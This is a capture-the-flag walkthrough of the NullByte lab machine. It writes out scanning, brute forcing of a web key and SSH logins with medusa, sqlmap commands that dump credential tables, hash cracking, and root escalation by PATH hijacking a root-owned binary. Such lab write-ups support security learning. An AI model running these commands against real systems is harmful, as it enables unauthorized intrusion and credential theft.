Null-Byte Report
  1. Find the blackbox with arp-scan 172.16.0.0/16, add it to scope in burp, run spider in burp and start scanning with nmap and nikto.
  2. nmap –p- -sV 172.16.0.13
    Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
50927/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • port 22 is forwarded to 777 instead.

  1. nikto –h 172.16.0.13
Server: Apache/2.4.10 (Debian)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ETag header found on server, fields: 0xc4 0x51c42a5c32a70
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6456 items checked: 0 error(s) and 4 item(s) reported on remote host

  1. run dirbuster to find more directories

  1. try to find more information, as I know we can hide strings inside pictures. Download the picture and open it with strings main.gif
    at the first line there is a string: kzMb5nVYJw
    try to add it to the url: http://172.16.0.13/kzMb5nVYJw



Checking the source of this page:
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>

  1. After several hints, there is no option to find the password.
    find the page in burp, send it to intruder or CTRL + I
    add a payload like rockyou or crackstation passwords.
    and run attack.

We can use hydra/medusa also to run this brute force attack.
Success!! The password is elite:

Continue without a username and click enter:

We have 2 users: isis and ramses
  1. Now, we have 2 options: hack them with brute force or using sqlmap.

  1. Medusa:
    medusa -u isis -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
    medusa -u ramses -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
  2. Hydra:


  3. Sqlmap:
    sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --dbs

Check mysql database:
sqlmap –u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --batch  --dump -C User,Password -T user -D mysql

Check the application:

Check seth database:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth

The code: YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= is base64 let decode it with:
echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= |base64 –d
the result is: c6d6bd7ebf806f43c76acc3681703b81
Check this MD5 hash with john, hashcat or crackstation, the password is:
omega
  1. Login to ssh: User ramses, Password omega
    ssh ramses@172.16.0.13 –p 777

Logged in!

  1. ramses@NullByte:~$ ls -lha
drwxr-xr-x 2 ramses ramses 4.0K Aug  2  2015 .
drwxr-xr-x 5 root   root   4.0K Aug  2  2015 ..
-rw------- 1 ramses ramses   96 Aug  2  2015 .bash_history
-rw-r--r-- 1 ramses ramses  220 Aug  2  2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3.5K Aug  2  2015 .bashrc
-rw-r--r-- 1 ramses ramses  675 Aug  2  2015 .profile
Check all the files content, we have valued information in .bash_history
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit

cd to /var/www/backup and check what procwatch is?
Procwatch is security monitor written in Perl that watches a /proc filesystem for new processes. When a process is created, procwatch reports the time, the username, the PID, and the binary that was run. Its output is suitable for logging to log files and is geared for system administrators who are testing a new but as yet untrusted UNIX system.

Procwatch is root owned that mean the file is running with root priviliges.

Run procwatch we can see its running sh and ps.

Create a new ps file echo /bin/sh > ps
chmod +x ps

Create a new sh file echo /bin/sh > sh
chmod +x sh

set path to:
export PATH=/var/www/backup:${PATH}

run procwatch:

Yess! Root!!


At /root there is a proof file:

Share To:

Fabio Lior Rahamim